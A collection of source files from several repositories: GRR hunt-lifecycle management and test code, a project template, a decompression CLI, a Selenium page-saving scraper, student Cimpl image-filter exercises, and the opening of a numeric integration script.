from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import hunt_objects as rdf_hunt_objects
from grr_response_server.rdfvalues import objects as rdf_objects
MIN_CLIENTS_FOR_AVERAGE_THRESHOLDS = 1000
class Error(Exception):
pass
class UnknownHuntTypeError(Error):
pass
class OnlyPausedHuntCanBeModifiedError(Error):
def __init__(self, hunt_obj):
super(OnlyPausedHuntCanBeModifiedError,
self).__init__("Hunt %s can't be modified since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyPausedHuntCanBeStartedError(Error):
def __init__(self, hunt_obj):
super(OnlyPausedHuntCanBeStartedError,
self).__init__("Hunt %s can't be started since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyStartedHuntCanBePausedError(Error):
def __init__(self, hunt_obj):
super(OnlyStartedHuntCanBePausedError,
self).__init__("Hunt %s can't be paused since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyStartedOrPausedHuntCanBeStoppedError(Error):
def __init__(self, hunt_obj):
super(OnlyStartedOrPausedHuntCanBeStoppedError,
self).__init__("Hunt %s can't be stopped since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
def IsLegacyHunt(hunt_id):
return hunt_id.startswith("H:")
def StopHuntIfAverageLimitsExceeded(hunt_obj):
"""Stops the hunt if average limites are exceeded."""
# Do nothing if the hunt is already stopped.
if hunt_obj.hunt_state == rdf_hunt_objects.Hunt.HuntState.STOPPED:
return hunt_obj
total_clients = (
hunt_obj.num_successful_clients + hunt_obj.num_failed_clients +
hunt_obj.num_crashed_clients)
if total_clients < MIN_CLIENTS_FOR_AVERAGE_THRESHOLDS:
return hunt_obj
# Check average per-client results count limit.
if hunt_obj.avg_results_per_client_limit:
avg_results_per_client = (hunt_obj.num_results / total_clients)
if avg_results_per_client > hunt_obj.avg_results_per_client_limit:
# Stop the hunt since we get too many results per client.
reason = ("Hunt %s reached the average results per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id, hunt_obj.avg_results_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
# Check average per-client CPU seconds limit.
if hunt_obj.avg_cpu_seconds_per_client_limit:
avg_cpu_seconds_per_client = (
(hunt_obj.client_resources_stats.user_cpu_stats.sum +
hunt_obj.client_resources_stats.system_cpu_stats.sum) / total_clients)
if avg_cpu_seconds_per_client > hunt_obj.avg_cpu_seconds_per_client_limit:
# Stop the hunt since we use too many CPUs per client.
reason = ("Hunt %s reached the average CPU seconds per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id, hunt_obj.avg_cpu_seconds_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
# Check average per-client network bytes limit.
if hunt_obj.avg_network_bytes_per_client_limit:
avg_network_bytes_per_client = (
hunt_obj.client_resources_stats.network_bytes_sent_stats.sum /
total_clients)
if (avg_network_bytes_per_client >
hunt_obj.avg_network_bytes_per_client_limit):
# Stop the hunt since we use too many network bytes sent
# per client.
reason = ("Hunt %s reached the average network bytes per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id,
hunt_obj.avg_network_bytes_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
return hunt_obj
def CompleteHuntIfExpirationTimeReached(hunt_obj):
"""Marks the hunt as complete if it's past its expiry time."""
if (hunt_obj.hunt_state not in [
rdf_hunt_objects.Hunt.HuntState.STOPPED,
rdf_hunt_objects.Hunt.HuntState.COMPLETED
] and hunt_obj.expiry_time < rdfvalue.RDFDatetime.Now()):
StopHunt(hunt_obj.hunt_id, reason="Hunt completed.")
def UpdateFn(h):
h.hunt_state = h.HuntState.COMPLETED
return h
return data_store.REL_DB.UpdateHuntObject(hunt_obj.hunt_id, UpdateFn)
return hunt_obj
def StartHunt(hunt_id):
"""Starts a hunt with a given id."""
hunt_obj = data_store.REL_DB.ReadHuntObject(hunt_id)
output_plugins_states = None
if hunt_obj.output_plugins and not hunt_obj.output_plugins_states:
output_plugins_states = flow.GetOutputPluginStates(
hunt_obj.output_plugins,
source="hunts/%s" % hunt_obj.hunt_id,
token=access_control.ACLToken(username=hunt_obj.creator))
for ops in output_plugins_states:
ops.plugin_state["success_count"] = 0
ops.plugin_state["error_count"] = 0
def UpdateFn(h):
"""Updates given hunt in a transaction."""
if h.hunt_state != h.HuntState.PAUSED:
raise OnlyPausedHuntCanBeStartedError(h)
if (output_plugins_states is not None and
not hunt_obj.output_plugins_states):
h.output_plugins_states = output_plugins_states
h.hunt_state = h.HuntState.STARTED
h.hunt_state_comment = None
h.next_client_due = rdfvalue.RDFDatetime.Now()
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
if hunt_obj.hunt_state != hunt_obj.HuntState.STARTED:
return
foreman_condition = foreman_rules.ForemanCondition(
creation_time=rdfvalue.RDFDatetime.Now(),
expiration_time=hunt_obj.expiry_time,
description="Hunt %s %s" % (hunt_obj.hunt_id, hunt_obj.args.hunt_type),
client_rule_set=hunt_obj.client_rule_set,
hunt_id=hunt_obj.hunt_id)
# Make sure the rule makes sense.
foreman_condition.Validate()
data_store.REL_DB.WriteForemanRule(foreman_condition)
return hunt_obj
def PauseHunt(hunt_id, reason=None):
"""Pauses a hunt with a given id."""
def UpdateFn(h):
if h.hunt_state != h.HuntState.STARTED:
raise OnlyStartedHuntCanBePausedError(h)
h.hunt_state = h.HuntState.PAUSED
if reason is not None:
h.hunt_state_comment = reason
else:
h.hunt_state_comment = None
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
if hunt_obj.hunt_state == hunt_obj.HuntState.PAUSED:
data_store.REL_DB.RemoveForemanRule(hunt_id=hunt_obj.hunt_id)
return hunt_obj
def StopHunt(hunt_id, reason=None):
"""Stops a hunt with a given id."""
def UpdateFn(h):
if h.hunt_state not in [h.HuntState.STARTED, h.HuntState.PAUSED]:
raise OnlyStartedOrPausedHuntCanBeStoppedError(h)
h.hunt_state = h.HuntState.STOPPED
if reason is not None:
h.hunt_state_comment = reason
return h
# If the hunt was not started or paused, the exception from UpdateFn is
# guaranteed to be propagated by UpdateHuntObject implementation.
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
data_store.REL_DB.RemoveForemanRule(hunt_id=hunt_obj.hunt_id)
flows = data_store.REL_DB.ReadHuntFlows(hunt_obj.hunt_id, 0, sys.maxsize)
data_store.REL_DB.UpdateFlows(
[(f.client_id, f.flow_id) for f in flows],
pending_termination=rdf_flow_objects.PendingFlowTermination(
reason="Parent hunt stopped."))
if (reason is not None and
hunt_obj.creator not in aff4_users.GRRUser.SYSTEM_USERS):
notification.Notify(
hunt_obj.creator, rdf_objects.UserNotification.Type.TYPE_HUNT_STOPPED,
reason,
rdf_objects.ObjectReference(
reference_type=rdf_objects.ObjectReference.Type.HUNT,
hunt=rdf_objects.HuntReference(hunt_id=hunt_obj.hunt_id)))
return hunt_obj
def UpdateHunt(hunt_id, client_limit=None, client_rate=None, expiry_time=None):
"""Updates a hunt (it must be paused to be updated)."""
def UpdateFn(hunt_obj):
"""Update callback used by UpdateHuntObject."""
if hunt_obj.hunt_state != hunt_obj.HuntState.PAUSED:
raise OnlyPausedHuntCanBeModifiedError(hunt_obj)
if client_limit is not None:
hunt_obj.client_limit = client_limit
if client_rate is not None:
hunt_obj.client_rate = client_rate
if expiry_time is not None:
hunt_obj.expiry_time = expiry_time
return hunt_obj
return data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
def StartHuntFlowOnClient(client_id, hunt_id):
"""Starts a flow corresponding to a given hunt on a given client."""
hunt_obj = data_store.REL_DB.ReadHuntObject(hunt_id)
hunt_obj = CompleteHuntIfExpirationTimeReached(hunt_obj)
# There may be a little race between foreman rules being removed and
# foreman scheduling a client on an (already) paused hunt. Making sure
# we don't lose clients in such a race by accepting clients for paused
# hunts.
if hunt_obj.hunt_state not in [
rdf_hunt_objects.Hunt.HuntState.STARTED,
rdf_hunt_objects.Hunt.HuntState.PAUSED
]:
return
if hunt_obj.args.hunt_type == hunt_obj.args.HuntType.STANDARD:
hunt_args = hunt_obj.args.standard
def UpdateFn(h):
# h.num_clients > 0 check ensures that first client will be scheduled
# immediately and not 60.0 / h.client_rate seconds after the hunt is
# started.
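# (For example, with client_rate = 2 clients per minute, each subsequent client
# is due 60.0 / 2 = 30 seconds after the previous one.)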
if h.client_rate > 0 and h.num_clients > 0:
h.next_client_due = h.next_client_due + 60.0 / h.client_rate
h.num_clients += 1
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
start_at = hunt_obj.next_client_due if hunt_obj.client_rate > 0 else None
flow_cls = registry.FlowRegistry.FlowClassByName(hunt_args.flow_name)
flow_args = hunt_args.flow_args if hunt_args.HasField("flow_args") else None
flow.StartFlow(
client_id=client_id,
creator=hunt_obj.creator,
cpu_limit=hunt_obj.per_client_cpu_limit,
network_bytes_limit=hunt_obj.per_client_network_bytes_limit,
flow_cls=flow_cls,
flow_args=flow_args,
start_at=start_at,
parent_hunt_id=hunt_id)
if hunt_obj.client_limit and hunt_obj.num_clients >= hunt_obj.client_limit:
PauseHunt(hunt_obj.hunt_id)
elif hunt_obj.args.hunt_type == hunt_obj.args.HuntType.VARIABLE:
raise NotImplementedError()
else:
raise UnknownHuntTypeError("Can't determine hunt type when starting "
"hunt %s on client %s." % (client_id, hunt_id))
def GetHuntOutputPluginLogs(hunt_id, offset, count):
"""Gets hunt's output plugins logs."""
# TODO(user): this is a simplistic implementation that may return
# more results than requested. Refactor and improve.
flows = data_store.REL_DB.ReadHuntFlows(
hunt_id,
offset,
count,
filter_condition=db.HuntFlowsCondition.FLOWS_WITH_RESULTS_ONLY)
logs = []
for f in flows:
for op_state in f.output_plugins_states:
logs.extend(op_state.plugin_state["logs"])
return logs
def GetHuntOutputPluginErrors(hunt_id, offset, count):
"""Gets hunt's output plugins errors."""
# TODO(user): this is a simplistic implementation that may return
# more results than requested. Refactor and improve.
flows = data_store.REL_DB.ReadHuntFlows(
hunt_id,
offset,
count,
filter_condition=db.HuntFlowsCondition.FLOWS_WITH_RESULTS_ONLY)
errors = []
for f in flows:
for op_state in f.output_plugins_states:
errors.extend(op_state.plugin_state["errors"])
return errors
```
#### File: grr/test_lib/db_test_lib_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_core.lib.util import compatibility
from grr_response_server import data_store
from grr.test_lib import db_test_lib
from grr.test_lib import test_lib
@db_test_lib.DualDBTest
class DualDBTestDecoratorTest(test_lib.GRRBaseTest):
"""Test DualDBTest decorator."""
def _IsDBTest(self):
name = compatibility.GetName(self.__class__)
return name.endswith("_RelationalDBEnabled")
def _IsStableDBTest(self):
name = compatibility.GetName(self.__class__)
return name.endswith("_StableRelationalDBEnabled")
def _Description(self):
if self._IsDBTest() or self._IsStableDBTest():
return "RelationalDB enabled"
else:
return "RelationalDB disabled"
def testRelationalDBReadEnabled(self):
result = data_store.RelationalDBReadEnabled()
self.assertEqual(
result,
self._IsDBTest() or self._IsStableDBTest(),
"RelationalDBReadEnabled() is %s for %s" % (result,
self._Description()))
def testRelationalDBFlowsEnabled(self):
result = data_store.RelationalDBFlowsEnabled()
expected = self._IsDBTest() or self._IsStableDBTest()
self.assertEqual(
result, expected, "RelationalDBFlowsEnabled() is %s for %s" %
(result, compatibility.GetName(self.__class__)))
if __name__ == "__main__":
flags.StartMain(test_lib.main)
```
#### File: grr/test_lib/parser_test_lib_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
import mock
from grr_response_core.lib import flags
from grr_response_core.lib import parser
from grr_response_core.lib import parsers
from grr_response_core.lib.parsers import all as all_parsers
from grr.test_lib import parser_test_lib
from grr.test_lib import test_lib
class FooParser(parser.SingleResponseParser):
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BarParser(parser.SingleFileParser):
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
class BazParser(parser.SingleFileParser):
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
def SingleResponseParsers():
return parsers.SINGLE_RESPONSE_PARSER_FACTORY.CreateAll()
def SingleFileParsers():
return parsers.SINGLE_FILE_PARSER_FACTORY.CreateAll()
class WithAnnotationTestMixin(object):
# TODO(hanuszczak): This could actually be moved to some base test class.
def assertTypesEqual(self, instances, types):
self.assertCountEqual(map(type, instances), types)
class WithParserTest(WithAnnotationTestMixin, absltest.TestCase):
def testSingleParser(self):
@parser_test_lib.WithParser("Foo", FooParser)
def AssertFooIsRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
# By default, no parsers should be registered.
self.assertTypesEqual(SingleResponseParsers(), [])
# This function is annotated and should register defined parsers.
AssertFooIsRegistered()
# Afterwards, the factory should not have any parser registered again.
self.assertTypesEqual(SingleResponseParsers(), [])
def testMultipleParsers(self):
@parser_test_lib.WithParser("Foo", FooParser)
@parser_test_lib.WithParser("Bar", BarParser)
@parser_test_lib.WithParser("Baz", BazParser)
def AssertTestParsersAreRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
self.assertTypesEqual(SingleFileParsers(), [BarParser, BazParser])
# Again, by default no parsers should be registered.
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
# Every annotation should register corresponding parser.
AssertTestParsersAreRegistered()
# And again, all parsers should leave the clean state again.
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
class WithAllParsersTest(WithAnnotationTestMixin, absltest.TestCase):
def testWithCustomRegisterMethod(self):
def Register():
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Bar", BarParser)
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Baz", BazParser)
@parser_test_lib.WithAllParsers
def AssertAllTestParsersAreRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
self.assertTypesEqual(SingleFileParsers(), [BarParser, BazParser])
with mock.patch.object(all_parsers, "Register", Register):
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
AssertAllTestParsersAreRegistered()
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
if __name__ == "__main__":
flags.StartMain(test_lib.main)
``` |
{
"source": "4nif/py-project-template",
"score": 3
} |
#### File: py-project-template/pyproject/pyproject.py
```python
import sys
def main(args):
"""
Main command-line function.
"""
print(args)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "4nm1tsu/uncompressor",
"score": 3
} |
#### File: uncompressor/uncompressor/main.py
```python
import click
from . import compressed
from . import uncompress
@click.command()
@click.argument('srcs', type=click.Path(exists=True), nargs=-1)
@click.option('--dist', '-d', default='', help='An optional directory to which extract files.')
def uncmprs(srcs, dist):
if dist:
compressed.Compressed.dist = dist
with click.progressbar(srcs) as bar:
for src in bar:
file = compressed.Compressed(src)
if file.is_available():
# Decompress the file
uncompress.uncompress(file)
else:
click.secho('{file} is not a valid type'.format(file=file.path), fg='red')
def main():
uncmprs()
if __name__ == '__main__':
main()
``` |
{
"source": "4nth0nySLT/PyScraperHTML",
"score": 2
} |
#### File: 4nth0nySLT/PyScraperHTML/scraper.py
```python
from selenium.webdriver import Chrome
import time
from random import randrange
import os, subprocess,zipfile,io
import requests
from glob import glob
def actualizar():
proc=subprocess.run('cmd /c dir /B/AD "'+str(glob("c:\\*\\Google\\Chrome\\Application\\")[0])+'" | findstr /R /C:"^[0-9].*\\..*[0-9]$"',stdout=subprocess.PIPE, stderr=subprocess.PIPE)
version= proc.stdout.decode().split('\r')[0]
try:
resp=requests.get('https://chromedriver.storage.googleapis.com/LATEST_RELEASE_'+'.'.join(version.split('.')[:3]))
resp=requests.get('https://chromedriver.storage.googleapis.com/'+resp.text+'/chromedriver_win32.zip')
zipF = zipfile.ZipFile(io.BytesIO(resp.content))
try:
os.remove('chromedriver.exe')
except:
try:
os.rename('chromedriver.exe','chromedriverold.exe')
except:
try:
os.rename('chromedriver.exe','borrameANTHONY'+str(time.time()))
except:
pass
zipF.extractall()
res=True
try:
os.remove('chromedriverold.exe')
for i in glob("borrameANTHONY*"):
os.remove(i)
except:
pass
except Exception as e:
print(e)
res=False
return res
def navegador(url="https://google.com"):
try:
session=Chrome()
except:
ver=actualizar()
if ver==True:
session=Chrome()
else:
print("Error")
return "error"
try:
session.get(url)
except:
session.get("https://google.com")
memoria=""
while 1:
try:
html=session.find_element_by_tag_name("html").get_attribute('outerHTML')
if html!=memoria:
filename=session.title
filename="".join([c for c in filename if c.isalpha() or c.isdigit() or c==' ']).rstrip()
try:
os.mkdir(filename)
except:
pass
filename='./'+filename+"/"+filename+"_"+str(int(time.time()))+str(randrange(1000,9999))+".html"
with open(filename,"ab") as file:
file.write(html.encode())
memoria=html
else:
time.sleep(1)
except Exception as e:
print(e)
pass
url=input("Url: ")
if url=="":
navegador()
navegador(url)
``` |
{
"source": "4ntLu0/1051-Project",
"score": 4
} |
#### File: 1051-Project/Milestone1/L2_5_P2_contrast.py
```python
from Cimpl import *
image = load_image(choose_file()) # loads the desired image from a given file
show(image) # displays the image to the user
image1 = copy(image) # creates a copy of the image so it is not overwritten when the new image is returned
def extreme_contrast(image: Image) -> Image:
""" Using a given image, the this function alters the r, g and b components to create a new contrasted image.
Written by <NAME>.
>>> extreme_contrast(IMAGE)
IMAGE comes out with all pixels being extremely contrasted.
<Cimpl.Image object at 0x00000278831087B8>
"""
for x, y, (r, g, b) in image1:
if 0 < r < 127:
r = 0
else:
r = 255
if 0 < g < 127:
g = 0
else:
g = 255
if 0 < b < 127:
b = 0
else:
b = 255
set_color(image1, x, y, create_color(r, g, b))
show(image1)
return image1
```
#### File: 1051-Project/Milestone2/L2_5_P4_test_extreme.py
```python
from L2_5_P4_extreme import extreme_contrast
from Cimpl import create_color, set_color, save_as, show, load_image, Image,\
choose_file, copy
"""
CODE ATTRIBUTED FROM FILES ON CULEARN
test function that reviews the code for the contrasting filter to see if the
pixels are properly analyzed, if the original image changes and if the image
has been contrasted
HOW TO RUN CODE
Run the file
pixels of chosen image are analyzed and a contrasted version of the
image will appear
END OF CODE
written by Emilio: 101143244
"""
def test_extreme():
image = load_image( choose_file ( ) ) # Loads a file that you choose
for x, y, (r, g, b) in image:
print('this pixel has been analyzed correctly')
else:
print('this pixel has not been analyzed correctly')
if image == extreme_contrast(image):
print('the image contrast has: PASSED THE TEST')
else:
print('the image contrast has: FAILED THE TEST')
if __name__ == '__main__':
test_extreme()
```
#### File: 1051-Project/Milestone2/L2_5_p5_test_vertical.py
```python
from Cimpl import *
image = load_image(choose_file())
def flip_vertical(image: Image) -> Image:
vertical_image = copy(image)
for x in range(get_width(image)):
for y in range(get_height(image)):
flipped_color = get_color(image, -x, y)
set_color(vertical_image, x, y, flipped_color)
show(vertical_image)
return vertical_image
def test_flip_vertical(image: Image) -> Image:
""" Writen by <NAME> (101147742). Function tests that all values of the x axis of the inputted image (into the flip_vertical function) are assigned to to their negative counterparts"""
vertical_image = flip_vertical(image)
for x in range(get_width(image)):
for y in range(get_height(image)):
original_colour = get_color(image, x, y)
for x in range(get_width(vertical_image)):
for y in range(get_height(vertical_image)):
vertical_colour = get_color(vertical_image, -x, y)
if original_colour == vertical_colour:
print('Test Passed')
else: print('Test Failed')
```
#### File: 1051-Project/Milestone2/L2_5_P5_vertical.py
```python
from Cimpl import show, copy, get_height, get_width,create_color, \
set_color, load_image, choose_file, create_image
def flip_vertical(img):
"""
A photo is displayed. The function is called and the rgb values for each
pixel are printed. ...
ex:
photo facing left is inserted
photo facing right is returned
'Written by <NAME>: 101143244'
DOCSTRING TESTING (what the function does)
Code is run
File explorer appears and an image can be selected
The height and width of this image is recorded and the rgb values for each
pixel are changed
New flipped image is returned with changes applied to it
Close the new image
END OF CODE
CODE HAS BEEN ATTRIBUTED FROM GIVEN FILES FOUND ON CULEARN
"""
show(img)
image = copy(img) #Creates the copy to prevent it from/
#Being overwritten
h= get_height(image) #Interprets the height of the image
w = get_width(image) #Interprets the width of the image
new_image = create_image( w, h ) #Creates an image with the same values/
#As h,w
#(Essentially creating an image of the/
#Same dimensions)
for pixel in image: #Examines all pixels in the new image
x,y,(r,g,b) = pixel
#Print(r,g,b) #Prints the r g b values of every pixel
new_color = create_color(r,g,b)
set_color(new_image, w - x - 1, y, new_color)
show(new_image)
return new_image
#Adjust pixels along x axis(width of image) ex: one pixel has a particular/
#Distance from one edge of the image, to flip the image, the pixel's distance/
#From the edge is now the same distance but from the other edge
if __name__ == '__main__':
new_image = load_image(choose_file())
flip_vertical(new_image)
```
#### File: 1051-Project/Milestone2/L2_5_three_tone.py
```python
from Utils.Cimpl import load_image, choose_file, show, set_color, save_as, create_color, get_width, get_height # change
# this later please
from Utils.simple_Cimpl_filters import grayscale
from typing import NewType, List
#import numpy as np
Image = NewType('Image', str)
from datetime import datetime
tones = {'black' : (0, 0, 0), 'white': (255, 255, 255), 'red': (255, 0, 0), 'lime': (0, 255, 0), 'blue': (0, 0, 255),
'yellow': (255, 255, 0), 'cyan': (0, 255, 255), 'magenta': (255, 0, 255), 'gray': (128, 128, 128)}
brightness = []
def threeTone(image: Image, col1: str, col2: str, col3: str, display: bool = False, txt: bool = True) -> Image:  # 'display' renamed from 'show' to avoid shadowing Cimpl's show()
""" Returns an image with three tones, with the darkest being the first tone, and brightest being the third tone.
Written by <NAME>.
:param image: the Cimpl Image to filter
:type image: Image
:param col1: colour used for the darkest pixels (average brightness below 84)
:type col1: str (a key of the tones dict), or an (r, g, b) tuple when txt is False
:param col2: colour used for mid-brightness pixels (average brightness 84 to 170)
:type col2: str or (r, g, b) tuple
:param col3: colour used for the brightest pixels (average brightness above 170)
:type col3: str or (r, g, b) tuple
:return: the filtered image
:rtype: Image
"""
if txt:
tone1r, tone1g, tone1b = tones[col1]
tone2r, tone2g, tone2b = tones[col2]
tone3r, tone3g, tone3b = tones[col3]
else:
tone1r, tone1g, tone1b = col1
tone2r, tone2g, tone2b = col2
tone3r, tone3g, tone3b = col3
tone1 = create_color(tone1r, tone1g, tone1b)
tone2 = create_color(tone2r, tone2g, tone2b)
tone3 = create_color(tone3r, tone3g, tone3b)
for x, y, (r, g, b) in image:
avg = (r + g + b) / 3
if avg < 84:
set_color(image, x, y, tone1)
elif avg <= 170:
set_color(image, x, y, tone2)
else:
set_color(image, x, y, tone3)
if display:
    show(image)
return image
if __name__ == '__main__':
image = load_image(choose_file())
print('image loaded, starting conversion')
save_as(threeTone(image, 'white', 'gray', 'black'), 'returns/three_tone.jpg')
print('conversion finished.')
if input(' would you like to view the image? [Y/N]') == 'Y':
show(image)
else:
print('ok, exiting code. byebye!')
```
#### File: Milestone2/Utils/L2-5-P2-green.py
```python
from Cimpl import *
image = load_image('p2-original.jpg') # loads the desired image from a given file
def green_filter( image1: Image ) -> Image:
"""Given an image from a selected file, the function sets all the pixels in the image to the color green and saves it as a new image.
<NAME> """
image = copy(image1) # creates a copy of the image so it is not overwritten once the new image is created
show(image)
for x, y, (r, g, b) in image: # reads through each pixel in the image
green = create_color(0, g, 0)
set_color(image, x, y, green) # sets all the pixels of defined locations in that image to the color green
save_as(image, 'green_channel.png') # saves the image
show(load_image('green_channel.png'))
print('green_channel saved as new image')
return image # return the green-filtered copy rather than the untouched original
def test_green() -> None:
''' Test function for green filter that tests if all the pixels in the image have been changed to green.
Written by <NAME>.
>>> test_green()
'''
image1 = green_filter(image)
for x, y, (r, g, b) in image1:
if r == 0 and b == 0: # checks that all of the pixels are green, and not blue nor red
print("PASS")
return
else:
print("FAIL") # Fails if there are pixels of the color red or blue
return
```
#### File: Milestone2/Utils/postereinesog.py
```python
from Cimpl import *
# adjustment function, Author: <NAME> S# 101144277
def _adjust_component(r, g , b) -> tuple:
"""
Author: <NAME> S# 101144277
Returns the quantized (r, g, b) components used by the posterize filter:
each component is mapped to the centre of its quarter of the 0-255 range.
Examples:
>>> _adjust_component(100, 10, 200)
(96, 32, 224)
"""
r2 = 0
g2 = 0
b2 = 0
if r <= 63 and r > 0:
r2 = 32
elif r <= 127 and r > 64:
r2 = 96
elif r <= 191 and r > 128:
r2 = 160
elif r <= 255 and r > 192:
r2 = 224
if g <= 63 and g > 0:
g2 = 32
elif g <= 127 and g > 64:
g2 = 96
elif g <= 191 and g > 128:
g2 = 160
elif g <= 255 and g > 192:
g2 = 224
if b <= 63 and b > 0:
b2 = 32
elif b <= 127 and b > 64:
b2 = 96
elif b <= 191 and b > 128:
b2 = 160
elif b <= 255 and b > 192:
b2 = 224
return r2,g2,b2
# posterize function, Author: <NAME> S# 101144277
def posterize(file: str)-> Image:
"""
Author: <NAME> S# 101144277
Returns an image but filtered to posterize:
Examples:
>>> posterize('p2-original.jpg')
sets all the pixels in the file in posterize
"""
image = load_image(file)
posterize_image = copy(image)
for x, y, (r, g, b) in image:
adjustColor = _adjust_component(r,g,b)
r2 , g2 , b2 = adjustColor
red = create_color(r2 ,g2 ,b2)
set_color(posterize_image, x, y, red)
return posterize_image
```
#### File: 4ntLu0/1051-Project/simple_Cimpl_filters.py
```python
from Cimpl import choose_file, load_image, copy, create_color, set_color,\
show, Image, get_color
def invert(image: Image) -> Image:
"""Return an inverted copy of image; that is, an image that is a colour
negative of the original image.
>>> image = load_image(choose_file())
>>> inverted = invert(image)
>>> show(inverted)
"""
new_image = copy(image)
# Invert the intensities of every component in every pixel.
for x, y, (r, g, b) in image:
inverted = create_color(255 - r, 255 - g, 255 - b)
set_color(new_image, x, y, inverted)
return new_image
# Image processing filters that create grayscale images from a colour image.
def grayscale_from_red(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's red component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_red(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(r, r, r)
set_color(new_image, x, y, gray)
return new_image
def grayscale_from_green(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's green component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_green(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(g, g, g)
set_color(new_image, x, y, gray)
return new_image
def grayscale_from_blue(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's blue component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_blue(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(b, b, b)
set_color(new_image, x, y, gray)
return new_image
def grayscale(image: Image) -> Image:
"""Return a grayscale copy of image.
>>> image = load_image(choose_file())
>>> gray_image = grayscale(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
# Use the pixel's brightness as the value of RGB components for the
# shade of gray. This means that the pixel's original colour and the
# corresponding gray shade will have approximately the same brightness.
brightness = (r + g + b) // 3
# or, brightness = (r + g + b) / 3
# create_color will convert an argument of type float to an int
gray = create_color(brightness, brightness, brightness)
set_color(new_image, x, y, gray)
return new_image
def test_grayscale() -> None:
'''Start of a test function for grayscale.
Tests if the first few pixels are shades of gray.
>>> test_grayscale()
'''
image = load_image('riveter.jpg')
gray_image = grayscale(image)
# Check if pixel @ (0, 0) is gray.
r, g, b = get_color(gray_image, 0, 0)
if r != g or g != b:
print('FAIL: Pixel @ (0, 0), r =', r, 'g =', g, 'b =', b)
return
# Check pixel @ (1, 0) is gray.
r, g, b = get_color(gray_image, 1, 0)
if r != g or g != b:
print('FAIL: Pixel @ (1, 0), r =', r, 'g =', g, 'b =', b)
return
# Check pixel @ (2, 0) is gray.
r, g, b = get_color(gray_image, 2, 0)
if r != g or g != b:
print('FAIL: Pixel @ (2, 0), r =', r, 'g =', g, 'b =', b)
return
print('PASS')
# Exercise 1 (easy):
# How can we modify test_grayscale so that it visits every pixel in the image,
# checking if each one is a shade of gray?
#
# Exercise 2 (more challenging)
# How can we modify test_grayscale so that it visits every pixel in the image,
# checking if grayscale calculated the correct shade of gray for the pixel?
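# One possible sketch for Exercise 1 (added as an illustration; not part of the
# original handout). It walks every pixel of the grayscale copy and checks that
# its R, G and B components are equal.
def test_grayscale_every_pixel() -> None:
    '''Check that every pixel of the grayscale copy is a shade of gray.'''
    image = load_image('riveter.jpg')
    gray_image = grayscale(image)
    for x, y, (r, g, b) in gray_image:
        if r != g or g != b:
            print('FAIL: Pixel @ ({}, {}), r = {} g = {} b = {}'.format(x, y, r, g, b))
            return
    print('PASS')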
``` |
{
"source": "4ntongC/Scientific-Computing-MATH-GA-2043",
"score": 3
} |
#### File: Scientific Computing Projects (Code Parts)/2/Numeric_Integration.py
```python
from scipy import integrate
class m:
def __init__(this, f):
this.f = f
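# RR1f: composite left-endpoint rectangle rule over n sub-intervals (first-order accurate).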
def RR1f(a, b, n, m):
ans = 0;
delta = (b - a) / n #length of each interval
x = a - delta
for i in range(n):
x += delta
ans += m.f(x)*delta
return ans
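# MR2f: composite midpoint rule over n sub-intervals (second-order accurate).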
def MR2f(a, b, n, m):
ans = 0
delta = (b - a) / n
x = a - delta / 2
for i in range(n):
x += delta
ans += m.f(x)*delta
return ans
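# RR1a: adaptive wrapper around RR1f -- doubles n until the relative error against
# scipy's quad reference drops below tol, or n exceeds n_max.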
def RR1a(a, b, n0, m, tol):
accu = integrate.quad(m.f, a, b)[0]
approx = RR1f(a, b, n0, m)
err = abs(accu - approx)
n_max = 1000000
